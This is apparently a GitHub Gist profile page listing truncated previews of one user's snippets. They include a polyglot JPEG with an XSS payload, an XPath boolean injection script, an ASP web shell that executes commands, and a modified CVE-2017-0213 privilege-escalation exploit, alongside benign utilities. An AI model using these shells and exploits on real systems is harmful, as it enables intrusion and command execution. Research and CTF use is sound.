Skip to content

Instantly share code, notes, and snippets.

View wxrdnx's full-sized avatar
🐈
🐱

wxrdnx

🐈
🐱
39 followers · 10 following
  • University of Wisconsin
  • Madison, Wisconsin
View GitHub Profile
@wxrdnx
wxrdnx / polygot_jpeg_js.py
Created February 21, 2025 23:28
Polygot JPEG JS
img = b''
xss_payload = b'*/=1;' # ÿØÿà=1
xss_payload += b'alert(1)' # The actual XSS payload
xss_payload += b'/*' # Comment out the rest of the image
malicious_file = b'exploit.jpg'
assert len(xss_payload) + 2 < 0x10000, "The length of your XSS Payload should be less than 0x10000"
img += b'\xff\xd8' # SOI
@wxrdnx
wxrdnx / aiohttp_parallel_scan.py
Last active February 6, 2025 21:42
aiohttp parallel scan
import aiohttp
import asyncio
async def fetch(session, url):
async with session.get(url) as response:
result = await response.text()
if not (len(result) in [139, 142, 145]):
print(url, result, len(result))
async def main():
@wxrdnx
wxrdnx / build_web_socket_frame.py
Last active February 6, 2025 21:47
Build Web Socket Frame
import os
def build_websocket_frame(data):
frame = b'\x81'
if len(data) <= 125:
frame += bytes([0x80 | len(data)])
elif len(data) <= 65535:
frame += bytes([0x80 | 126])
frame += len(data).to_bytes(2, 'big')
else:
@wxrdnx
wxrdnx / xpath_boolean.py
Created November 18, 2024 23:33
XPath Injection Boolean
import requests
import string
url = ...
username = ...
MAX_PW_LEN = 64
def success(html):
return username in html
@wxrdnx
wxrdnx / GNUPG Cheatsheet.md
Created May 2, 2024 03:11 — forked from turingbirds/GNUPG Cheatsheet.md
GPG (GNUPG) Cheatsheet

GNUPG CHEATSHEET

Setting up: key generation

This generates a public/private keypair.

$ gpg --gen-key

$ gpg --list-secret-keys

@wxrdnx
wxrdnx / pure_hex_dump.sh
Created April 19, 2024 22:22
Pure Hex Dump for Linux
od -t x1 -An file.txt | sed 's/ //g' | tr -d '\n'
@wxrdnx
wxrdnx / web_shell.asp
Created April 3, 2024 22:56
ASP Web Shell That Actually Works
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
@wxrdnx
wxrdnx / CVE-2017-0213_modified.cpp
Created March 9, 2024 20:45
CVE-2017-0213 Modified
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107
Windows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP
Platform: Windows 10 10586/14393 not tested 8.1 Update 2
Class: Elevation of Privilege
Summary:
When accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.
@wxrdnx
wxrdnx / fatal_function.c
Created February 28, 2024 19:13
The fatal function in C
void noreturn fatal(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
vfprintf(stderr, fmt, args);
va_end(args);
exit(EXIT_FAILURE);
}
@wxrdnx
wxrdnx / fatal_macro.c
Created February 28, 2024 19:12
The fatal function in C using macro
#define die(fmt, ...) do { \
fprintf(stderr, fmt, ##__VA_ARGS__); \
exit(EXIT_FAILURE); \
} while (0)